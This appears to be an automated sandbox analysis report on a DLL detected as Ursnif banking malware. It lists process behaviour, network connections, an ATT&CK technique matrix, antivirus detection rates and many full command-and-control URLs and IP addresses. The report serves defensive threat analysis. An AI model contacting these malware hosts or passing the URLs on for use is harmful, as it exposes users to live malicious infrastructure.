System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 31.41.46.120 80
Source: C:\Windows\SysWOW64\regsvr32.exe	Domain query: www.nnnnnn.casa
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 162.255.119.177 80
Source: C:\Windows\SysWOW64\regsvr32.exe	Domain query: nnnnnn.casa
Source: C:\Windows\SysWOW64\regsvr32.exe	Domain query: intermedia.bar
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 198.54.117.212 80
Source: C:\Windows\SysWOW64\regsvr32.exe	Domain query: nnnnnn.bar
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 192.64.119.233 80
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 198.54.117.215 80
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 198.54.117.216 80

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll",#1

Source: loaddll32.exe, 00000001.00000002.810390997.0000000001730000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.811434769.0000000003A60000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.810668747.0000000002BA0000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.810609680.0000000002D00000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000001.00000002.810390997.0000000001730000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.811434769.0000000003A60000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.810668747.0000000002BA0000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.810609680.0000000002D00000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000001.00000002.810390997.0000000001730000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.811434769.0000000003A60000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.810668747.0000000002BA0000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.810609680.0000000002D00000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000001.00000002.810390997.0000000001730000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.811434769.0000000003A60000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.810668747.0000000002BA0000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.810609680.0000000002D00000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_010C21BC cpuid

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_10001DCF GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_1000169C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_010C21BC RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

Stealing of Sensitive Information

Yara detected Ursnif

Source: Yara match	File source: 00000005.00000003.349703615.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.343910189.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.349753525.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.348956479.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.344026783.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.343809632.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.503813220.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.348909317.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.691343134.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.350624974.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.350468495.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.813030577.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.349673542.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.343983183.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.343884833.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.811764188.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.349765761.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.343969010.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.811066205.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.350524992.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.349774706.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.350610044.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.349722283.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.505253975.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.350578118.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.348881206.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.348997305.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.350596775.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.343764685.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.350398147.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.343941350.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.349738190.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.349603405.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.350426132.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.349008394.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.502184053.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.811636892.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.348935901.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.348822890.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.348974214.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 7132, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6460, type: MEMORYSTR

Remote Access Functionality

Yara detected Ursnif

Source: Yara match	File source: 00000005.00000003.349703615.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.343910189.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.349753525.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.348956479.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.344026783.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.343809632.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.503813220.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.348909317.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.691343134.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.350624974.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.350468495.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.813030577.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.349673542.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.343983183.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.343884833.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.811764188.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.349765761.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.343969010.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.811066205.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.350524992.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.349774706.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.350610044.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.349722283.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.505253975.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.350578118.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.348881206.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.348997305.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.350596775.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.343764685.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.350398147.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.343941350.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.349738190.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.349603405.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.350426132.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.349008394.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.502184053.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.811636892.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.348935901.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.348822890.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.348974214.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 7132, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6460, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Obfuscated Files or Information	1 Input Capture	1 System Time Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 Data Encrypted for Impact
Default Accounts	12 Native API	Boot or Logon Initialization Scripts	112 Process Injection	1 Software Packing	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Input Capture	Exfiltration Over Bluetooth	2 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 DLL Side-Loading	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Masquerading	NTDS	114 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	2 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	11 Virtualization/Sandbox Evasion	LSA Secrets	11 Security Software Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	112 Process Injection	Cached Domain Credentials	11 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Regsvr32	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Rundll32	Proc Filesystem	1 System Owner/User Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	1 Remote System Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Link
Wartless_v8.8.9.0.dll	20%	Virustotal	Browse
Wartless_v8.8.9.0.dll	14%	ReversingLabs
Wartless_v8.8.9.0.dll	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
1.2.loaddll32.exe.10000000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen8	Download File
6.2.rundll32.exe.4210000.1.unpack	100%	Avira	HEUR/AGEN.1108158	Download File
9.2.rundll32.exe.10000000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen8	Download File
9.2.rundll32.exe.4440000.1.unpack	100%	Avira	HEUR/AGEN.1108158	Download File
5.2.regsvr32.exe.4f90000.1.unpack	100%	Avira	HEUR/AGEN.1108158	Download File
5.2.regsvr32.exe.10000000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen8	Download File
6.2.rundll32.exe.10000000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen8	Download File
1.2.loaddll32.exe.10c0000.1.unpack	100%	Avira	HEUR/AGEN.1108158	Download File

Domains

Source	Detection	Scanner	Link
nnnnnn.bar	13%	Virustotal	Browse
nnnnnn.casa	13%	Virustotal	Browse
www.nnnnnn.casa	7%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://nnnnnn.casa/drew/c0nPYFX4zb59h_2F/qctVP12WCFNRJoO/0H9NzUZripQLxYTbGd/R62DjUJbv/AkTvnBTIOP0gGd	100%	Avira URL Cloud	malware
http://intermedia.bar/drew/sJjHsvpax4Nzwn6/j_2BIK7xkvvLg0K_2B/rW_2F1MVm/0X2RDVp6mN6jHjHQXHVv/lXgIE5seTAjCr_2BptR/zhdF_2B4iq_2F_2BdHZdbI/ppfIxjLZ1jFYb/jyraclx8/vY5o1N_2BBLJzcq8mbek0fq/sxBZO8XqCk/AZEFg4uupv5GBukaQ/chXIble8iRyF/2WTf0LlFxoi/1E61e67K_2BmUA/YOX2fReueqR9_2BbftFvZ/gzjKHMsB77w59NKXhfCT1/8O.jlk	0%	Avira URL Cloud	safe
http://nnnnnn.bar/drew/RIWYrzIoHP_2FLrdN/XJ_2BwD4EEew/6sYapNOqqjb/XWEflp4K5kHXkq/EIbryuQTJReV3fXYLSoiW/TIliiVRGIc01fzYH/Bn5ukiFg4DUJLyQ/1rmOsCaKf0G_2BUfXi/in6ecd1lV/GkhZR4sJ9fujnaCVTs1B/mnY6PTmL1ZVmiKTWjQI/AkdYwwVp3A4GBnLp0zxYLt/aP4I1SQJrUv6t/rokWtZ5P/95kl37fn4wnhNVnKrJRMavm/Bbn.jlk	100%	Avira URL Cloud	malware
http://nnnnnn.bar/.x	100%	Avira URL Cloud	malware
http://intermedia.bar/drew/QsS2jHAM_/2BwJZccmdp5m9iHVP9BE/Hy_2Bb24NYz6UUYImCo/zrhZsMNoFc_2FvJseSFb87/xXKn3PzxfNPne/1IWtDw4e/zao8w3_2FqS1tUowEpdILrG/AQc_2F2CTQ/Kg84n698KmhLQ87R8/T3KY8S12PpxD/H69sMspGVxv/is2jKybUtpc7W2/tjpg5c_2BM2CHgmR9sa3h/opwZ5u985b9SYlvV/9nvFId2LU1FOjTP/3gzCgoFC/zqOGqAVh/K.jlk	0%	Avira URL Cloud	safe
http://www.nnnnnn.casa/drew/_2B03VnehjE70sxbkc/jyrt4kETn/GIT8yZh3IbCxiT_2Foqi/AVmT8sl3RBATNe233tn/ZpXwd5tIp9mQUoOfWLynTM/O86glIn9ihyHk/5dZsFtfy/gp_2FLvf0NHL3yVUkVbncwC/We6V8shIxB/_2BT5Ij9nSjAjmHue/61Ynbzrr_2B_/2FOk8Wface5/lcJD0_2FBb9PKs/3pUPEuZF5gHL68StfaFm9/KhGw_2FEloE_2FaF/OCoSTxCMO1I6oVZ/G3ADi.jlk	100%	Avira URL Cloud	malware
http://intermedia.bar/drew/zd0veKiw3e_2FVw/JJ7tbavOiQvA9d8rHF/MReVkRvio/SC3uRIruy_2BXo_2FvjQ/5wwzMoShaTYrGjtEhg7/Q4EU_2F58MrLDOMpnwDvQl/4oAzAGZ9KhB2P/11ho7azQ/oSQaJwmg4Z33JCzj8wVAL4y/p2pAzghuFr/NTjo_2FX5hnFJvVKJ/pSUsYhZ3ii5t/IXWGFfzs8Ne/P3kSZsDcK04c9o/M4TxQU3QgnIS7BTTFhUW8/eYRw_2Bi9Rap_2/FlW.jlk	0%	Avira URL Cloud	safe
http://nnnnnn.casa/drew/clKY_2F9qhXNW5H/_2BsVRKIgOamiE9mQB/_2FVdwPGE/BPO6UbinW_2B8Sjp_2Bo/55Xmf7HJU6cUJy8fy4_/2FKKDKVKISZpEe4syLM93A/M41SvTBw4e_2F/120g53mI/wJJMq93zmJf2crfPUE2j_2B/GM6GQoMDYy/B7CUA1_2BisXnKYTP/uGoP10_2BxHm/imkRUl8or1j/Bw6x7_2BZqhh0x/t_2F833CW3gz1lZ3CY6hP/Kii0oYYxRGsc8HdH/lkRH05yG/dOy.jlk	100%	Avira URL Cloud	malware
http://nnnnnn.bar/drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd	100%	Avira URL Cloud	malware
http://www.nnnnnn.bar/drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk	100%	Avira URL Cloud	malware
http://intermedia.bar/drew/AHuA6TotyEkgE/zVHP4orW/8ZyPY4kye4oTIP7K7spF8Z9/AzQVZQntBp/tPbfiBhZz1jY6V1	0%	Avira URL Cloud	safe
http://nnnnnn.bar/drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bg	100%	Avira URL Cloud	malware
http://nnnnnn.bar	100%	Avira URL Cloud	malware
http://www.nnnnnn.bar/drew/SAsRWWRcgAYbX5O/sPIUsFF8_2Fn2uMxzA/aS_2B1MFO/_2B9vtqo1M2_2FHU754_/2FIz_2FEDBVzFRV2y7p/i4v3Y78Vy_2Bp_2BxdGdbM/whuGV1XTox4hc/jcJqVx_2/FC4hXQyB_2FvHrlQcEykfbJ/3l26l53hjv/IBYuGkcw1BuY86DQJ/aydytxVa1HaW/swwDbP87IxK/xN2GyTfX37m5pT/CCqiL659bjh4zm99trcC1/h4i2tWML6TK/YFULvmqt7CP/1.jlk	100%	Avira URL Cloud	malware
http://nnnnnn.bar/drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5	100%	Avira URL Cloud	malware
http://nnnnnn.bar/drew/SAsRWWRcgAYbX5O/sPIUsFF8_2Fn2uMxzA/aS_2B1MFO/_2B9vtqo1M2_2FHU754_/2FIz_2FEDBVzFRV2y7p/i4v3Y78Vy_2Bp_2BxdGdbM/whuGV1XTox4hc/jcJqVx_2/FC4hXQyB_2FvHrlQcEykfbJ/3l26l53hjv/IBYuGkcw1BuY86DQJ/aydytxVa1HaW/swwDbP87IxK/xN2GyTfX37m5pT/CCqiL659bjh4zm99trcC1/h4i2tWML6TK/YFULvmqt7CP/1.jlk	100%	Avira URL Cloud	malware
http://nnnnnn.casa/drew/c0nPYFX4zb59h_2F/qctVP12WCFNRJoO/0H9NzUZripQLxYTbGd/R62DjUJbv/AkTvnBTIOP0gGdcDC1Vg/H9xTO58gw9Sr3I5f1oE/852oWfQLj1eL_2Fm_2FKnu/SIHTeaF7Bgvig/PyHxZLDk/ZUvCeNpaiixducNV9xRZlOg/1p1YKkAvPe/T6UiZU08MHesYFSbA/viVchsnOxqJ5/4YMncTmEmBk/k6T3NHIv66mymC/b7Hkig2fkyCUi/2.jlk	100%	Avira URL Cloud	malware
http://www.nnnnnn.casa/drew/kntGHlOf6y1l7K/kCTU1frsUdQxnhn_2Fego/mw6bJXLxnfIRL2cj/FrdUucpG93hhEy_/2F	100%	Avira URL Cloud	malware
http://intermedia.bar/drew/AHuA6TotyEkgE/zVHP4orW/8ZyPY4kye4oTIP7K7spF8Z9/AzQVZQntBp/tPbfiBhZz1jY6V1X4/X3paMFGt7Rtb/Gt0dLluCvH5/isi1V1iV9bVleO/ZSGFxB9026a2AgTqikOVK/u0I_2FkyTPhzae4E/1G0e1neGkHRRAKR/dF6sfHEo8IqgOHnhhJ/mLAA5W_2B/LYdzOxqVD56rhjE9w2zj/4EWbKl1xgm4daCyR1mC/ReRKxfnNjlWG/r.jlk	0%	Avira URL Cloud	safe
http://www.nnnnnn.casa/drew/y8OOHzBXx4vT2Ja_/2BB0Liu_2F2FEpI/O7IlC7aNtEnJlyf21V/jvmc9z_2B/LgRR93FX60U2LAF0LNi_/2F_2BGce3vI_2BIkboe/46Qz18Ellyo_2BDKCHtUqk/Qk_2BAks18SnJ/U_2FwSgO/sE9Mmm7pd7FF8XBf_2Beleh/BwXJLGguic/wUEaBBM2DtBJsDeIK/yJJJ44VcWEyj/YNrlDdUaDHH/B2K_2BaEwy92zT/APjxiknoaFgUNKS3zmK7O/E1iKLdia/f.jlk	100%	Avira URL Cloud	malware
http://nnnnnn.bar/drew/SAsRWWRcgAYbX5O/sPIUsFF8_2Fn2uMxzA/aS_2B1MFO/_2B9vtqo1M2_2FHU754_/2FIz_2FEDBV	100%	Avira URL Cloud	malware
http://intermedia.bar/drew/69qrrEp29jAiA/GVIxoy3h/ZRI0if101gbT_2Fcb5gsrod/7F17KHpa_2/BUS9AgcQP0bD4Ff	0%	Avira URL Cloud	safe
http://intermedia.bar/drew/tN_2FPnM2JFaCc33jtc/NPCaV6rrqIxKNKP7n1AR3O/LMe16EhvI_2Bi/SLNSQXLS/EviOTr3	0%	Avira URL Cloud	safe
http://intermedia.bar/drew/QIymR1NV/VEHDP0tzxYyfhToi28JN0gN/4iuWFUXiYW/K0CJrXj0tnUEhVH78/U3kVKnzlLrQ	0%	Avira URL Cloud	safe
http://intermedia.bar/drew/QIymR1NV/VEHDP0tzxYyfhToi28JN0gN/4iuWFUXiYW/K0CJrXj0tnUEhVH78/U3kVKnzlLrQT/SmvkeHiBSVF/jSdieAe6QVgPYk/Ls60EE1RdzPENlayPGjHS/AIjKP7dUycBtEyrA/RFerBbxZvrxnd_2/Bc1S7J_2FQDJBAH3dG/kHsLUg6CP/6tr_2F_2FmCAcHtuBxvU/3I9dXvsa3LnrU2f8IF1/dsxBAmQu5x_2BsDF7qQMQs/L_2FeC4tc/dGJ.jlk	0%	Avira URL Cloud	safe
http://www.nnnnnn.casa/drew/c0nPYFX4zb59h_2F/qctVP12WCFNRJoO/0H9NzUZripQLxYTbGd/R62DjUJbv/AkTvnBTIOP	100%	Avira URL Cloud	malware
http://intermedia.bar/drew/tN_2FPnM2JFaCc33jtc/NPCaV6rrqIxKNKP7n1AR3O/LMe16EhvI_2Bi/SLNSQXLS/EviOTr3wnTfM22OhIhFDrhX/abhGbeDg_2/F32j7cFeBDC9GyCao/m10xhdMb4CCa/7HwtF9C64_2/F3b31QlJIQy42X/zsnIbRG3JRJ596u8kc4vW/CJEx7Xa659BvZ2yV/10sCxMgGuLgu5f6/Z9JRI8lQTnPNjwZZMu/mc129Uq8I/WlhkxbiPfyst/snQ.jlk	0%	Avira URL Cloud	safe
http://nnnnnn.bar/drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301f5PGhNuTKt/iiSaR_2F/n8Am2J9mxNTmPl3BY0FNmDo/WbT0YWuBTP/TEmXU5uU1cT7ugcpy/1Yw_2B7_2BA5/zH4_2Fv5Jdc/JEvdqIsT4YNX4X/Ugem1uvsn4Y_2B5TxE4dP/Zooo7xDl00PZrtZ2/TRQGSj1JZNQ3_2B/PqkSrh3KF/TKf0yp4Lb/KOz.jlk	100%	Avira URL Cloud	malware
http://intermedia.bar/ws	0%	Avira URL Cloud	safe
http://www.nnnnnn.casa/drew/kntGHlOf6y1l7K/kCTU1frsUdQxnhn_2Fego/mw6bJXLxnfIRL2cj/FrdUucpG93hhEy_/2F_2F05Q3POeadiys1/9wLWHm6Gx/wqhNI29IdUdv3CWDyCfs/2VD0tBt0szHqPTGNMaP/H8c1RSlzmz7xA6aMxeunJS/egWxomuGkwbso/At2D20BI/siieXymS6PJr8im_2FPJeye/Czlrk0gGlx/B4_2FnRkW1_2FVYbi/FmMXH_2Bbn2q/9Abbe5hphXR/x.jlk	100%	Avira URL Cloud	malware
http://intermedia.bar/drew/XRuGSIvrh83QGTYBTk/D9D3Vm19e/d5qtxwnIReenmX0dL_2F/z8AEjIs12VaPeEM7Fev/sHz	0%	Avira URL Cloud	safe
http://nnnnnn.bar/drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH8	100%	Avira URL Cloud	malware
http://nnnnnn.bar/drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk	100%	Avira URL Cloud	malware
